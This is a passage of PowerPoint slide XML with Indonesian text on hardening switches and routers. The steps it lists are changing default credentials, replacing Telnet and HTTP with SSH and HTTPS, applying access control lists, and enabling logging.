            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bermasalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membiarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hardening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>defaultnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didokumentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Aman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Access Control Lists (ACL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beralih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
